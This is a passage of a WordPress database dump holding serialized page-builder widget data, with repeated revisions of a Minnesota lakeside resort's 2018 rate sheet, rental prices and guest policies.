Available\nDaily\nWeekly\n\n14\' Lund Boat\n$20.00\n$100.00\n\n15 H.P. 4 Stroke Yamaha Motor\n$30.00\n$150.00\nPlus Gas\nBoat and Motor\n$50.00\n$250.00\nPlus Gas\n\n20\' Pontoon with 25 H.P. Motor\n$125.00\n$450.00\nPlus Gas\nPaddle Boards\n$5.00 per hour\nBoat Lifts\n$20.00\n$100.00\n\nBoat Launching/Docking\n\n\n$5.00 One time Fee\n\";s:5:\"title\";s:0:\"\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"9cffffcd-ffaa-480f-8a5a-0fcdb0ad395c\";s:5:\"style\";a:0:{}}}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1505,683,'panels_data','a:3:{s:7:\"widgets\";a:1:{i:0;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:833:\"Suite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:30:\"409639125ac0583755508065784081\";s:19:\"_sow_form_timestamp\";s:13:\"1522554941760\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"658fdf19-3f9f-4ea1-866c-3265e562ef7c\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:3:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1506,683,'panels_data','a:3:{s:7:\"widgets\";a:1:{i:0;a:5:{s:6:\"filter\";s:1:\"1\";s:4:\"text\";s:2041:\"Call us at 218-747-2959 for reservations A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nWireless Internet Available\n2018 Rates\n2018\nBedrooms\nWeekday Nightly\nWeekend Holiday Nightly\nWeekly Sept. – May\nWeekly June – Aug.\nMaximum Capacity\n\nSleepers Motel\n1\n$80.00\n$95.00\n$450.00\n$550.00\n4\nKitchenettes Motel\n1\n$100.00\n$130.00\n$600.00\n$700.00\n4\nSuite 9\n2\n$175.00\n$225.00\n$900.00\n$1,100.00\n4\nCabins (#10 #11 #12)\n2\n$180.00\n$230.00\n$900.00\n$1,100.00\n8\nCabins (#13 #14)\n2\n$200.00\n$250.00\n$1,000.00\n$1,200.00\n8\nTent & Popups\n1 per site\n$35.00\n$35.00\n$180.00\n$180.00\n\nRV/Travel Trailers\n1  per site\n$45.00\n$45.00\n$250.00\n$250.00\n\n\nPets\n\n$5.00\n$5.00\n$35.00\n$35.00\n\n\nAdditional People Camping (Each)\n\n$5.00\n$5.00\n$25.00\n$25.00\n\n\nAdditional People in Motel and Cabins (Each)\n\n$20.00\n$20.00\n$100.00\n$100.00\n\n\nSuite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\n \n\nEquipment Rentals\nIf Available\nDaily\nWeekly\n\n14\' Lund Boat\n$20.00\n$100.00\n\n15 H.P. 4 Stroke Yamaha Motor\n$30.00\n$150.00\nPlus Gas\nBoat and Motor\n$50.00\n$250.00\nPlus Gas\n\n20\' Pontoon with 25 H.P. Motor\n$125.00\n$450.00\nPlus Gas\nPaddle Boards\n$5.00 per hour\nBoat Lifts\n$20.00\n$100.00\n\nBoat Launching/Docking\n\n\n$5.00 One time Fee\n\";s:5:\"title\";s:0:\"\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"9cffffcd-ffaa-480f-8a5a-0fcdb0ad395c\";s:5:\"style\";a:0:{}}}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1507,683,'panels_data','a:3:{s:7:\"widgets\";a:1:{i:0;a:5:{s:6:\"filter\";s:1:\"1\";s:4:\"text\";s:2041:\"Call us at 218-747-2959 for reservations A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nWireless Internet Available\n2018 Rates\n2018\nBedrooms\nWeekday Nightly\nWeekend Holiday Nightly\nWeekly Sept. – May\nWeekly June – Aug.\nMaximum Capacity\n\nSleepers Motel\n1\n$80.00\n$95.00\n$450.00\n$550.00\n4\nKitchenettes Motel\n1\n$100.00\n$130.00\n$600.00\n$700.00\n4\nSuite 9\n2\n$175.00\n$225.00\n$900.00\n$1,100.00\n4\nCabins (#10 #11 #12)\n2\n$180.00\n$230.00\n$900.00\n$1,100.00\n8\nCabins (#13 #14)\n2\n$200.00\n$250.00\n$1,000.00\n$1,200.00\n8\nTent & Popups\n1 per site\n$35.00\n$35.00\n$180.00\n$180.00\n\nRV/Travel Trailers\n1  per site\n$45.00\n$45.00\n$250.00\n$250.00\n\n\nPets\n\n$5.00\n$5.00\n$35.00\n$35.00\n\n\nAdditional People Camping (Each)\n\n$5.00\n$5.00\n$25.00\n$25.00\n\n\nAdditional People in Motel and Cabins (Each)\n\n$20.00\n$20.00\n$100.00\n$100.00\n\n\nSuite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\n \n\nEquipment Rentals\nIf Available\nDaily\nWeekly\n\n14\' Lund Boat\n$20.00\n$100.00\n\n15 H.P. 4 Stroke Yamaha Motor\n$30.00\n$150.00\nPlus Gas\nBoat and Motor\n$50.00\n$250.00\nPlus Gas\n\n20\' Pontoon with 25 H.P. Motor\n$125.00\n$450.00\nPlus Gas\nPaddle Boards\n$5.00 per hour\nBoat Lifts\n$20.00\n$100.00\n\nBoat Launching/Docking\n\n\n$5.00 One time Fee\n\";s:5:\"title\";s:0:\"\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"9cffffcd-ffaa-480f-8a5a-0fcdb0ad395c\";s:5:\"style\";a:0:{}}}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1508,684,'panels_data','a:3:{s:7:\"widgets\";a:1:{i:0;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:833:\"Suite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:30:\"409639125ac0583755508065784081\";s:19:\"_sow_form_timestamp\";s:13:\"1522554941760\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"658fdf19-3f9f-4ea1-866c-3265e562ef7c\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:3:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1509,685,'panels_data','a:3:{s:7:\"widgets\";a:1:{i:0;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:833:\"Suite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:30:\"409639125ac0583755508065784081\";s:19:\"_sow_form_timestamp\";s:13:\"1522554941760\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"658fdf19-3f9f-4ea1-866c-3265e562ef7c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:2:{s:18:\"background_display\";s:4:\"tile\";s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1511,686,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1512,686,'panels_data','a:3:{s:7:\"widgets\";a:1:{i:0;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:833:\"Suite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:30:\"409639125ac0583755508065784081\";s:19:\"_sow_form_timestamp\";s:13:\"1522554941760\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"658fdf19-3f9f-4ea1-866c-3265e562ef7c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:2:{s:18:\"background_display\";s:4:\"tile\";s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1513,686,'panels_data','a:3:{s:7:\"widgets\";a:1:{i:0;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:833:\"Suite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:30:\"409639125ac0583755508065784081\";s:19:\"_sow_form_timestamp\";s:13:\"1522554941760\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"658fdf19-3f9f-4ea1-866c-3265e562ef7c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:2:{s:18:\"background_display\";s:4:\"tile\";s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1514,687,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1516,688,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1517,688,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1518,688,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL 